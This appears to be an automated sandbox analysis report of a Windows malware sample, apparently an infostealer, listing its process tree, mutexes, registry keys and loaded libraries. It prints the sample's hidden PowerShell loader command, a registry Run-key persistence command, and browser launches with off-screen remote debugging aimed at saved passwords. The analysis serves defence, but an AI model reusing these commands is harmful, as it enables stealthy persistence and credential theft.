              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404352
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D7890 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindWindowExA,GetWindowThreadProcessId,ShowWindow,Process32NextW,CloseHandle,4_2_214D7890
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,9_2_004148B6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-HMKDWQ
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:304:WilStaging_02
              Source: C:\Users\user\Desktop\rPO3799039985.exeFile created: C:\Users\user\AppData\Local\Temp\nsj25A7.tmpJump to behavior
              Source: rPO3799039985.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Users\user\Desktop\rPO3799039985.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.144169374536.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000004.00000002.148901215405.0000000021CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: chrome.exe, 00000008.00000002.144252803142.0000022E9C1B0000.00000002.00000001.00040000.00000018.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
              Source: msiexec.exe, 00000009.00000003.144186136835.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144186581747.0000000004D44000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144186176288.0000000004D44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
              Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: chrome.exe, 00000008.00000002.144252841629.0000022E9C1C5000.00000002.00000001.00040000.00000019.sdmp, chrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144205896494.000012AC008FC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144188233630.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144187932890.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.144190959145.0000000004D44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: msiexec.exe, 00000009.00000003.144183923892.0000000004D37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144183732529.0000000004D30000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144183850849.0000000004D31000.00000004.00000020.00020000.00000000.sdmp, Web Data.17.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: rPO3799039985.exeVirustotal: Detection: 18%
              Source: C:\Users\user\Desktop\rPO3799039985.exeFile read: C:\Users\user\Desktop\rPO3799039985.exeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
              Source: unknownProcess created: C:\Users\user\Desktop\rPO3799039985.exe "C:\Users\user\Desktop\rPO3799039985.exe"
              Source: C:\Users\user\Desktop\rPO3799039985.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hihycffzjvycrqdkhbgvqc"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\rlmjdxqbxdqhcwrorltxbhbpx"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2204,i,2239432924243639277,16353558222963723582,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10008014947784373590,7267593141464040591,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
              Source: C:\Users\user\Desktop\rPO3799039985.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hihycffzjvycrqdkhbgvqc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\rlmjdxqbxdqhcwrorltxbhbpx"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2204,i,2239432924243639277,16353558222963723582,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10008014947784373590,7267593141464040591,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
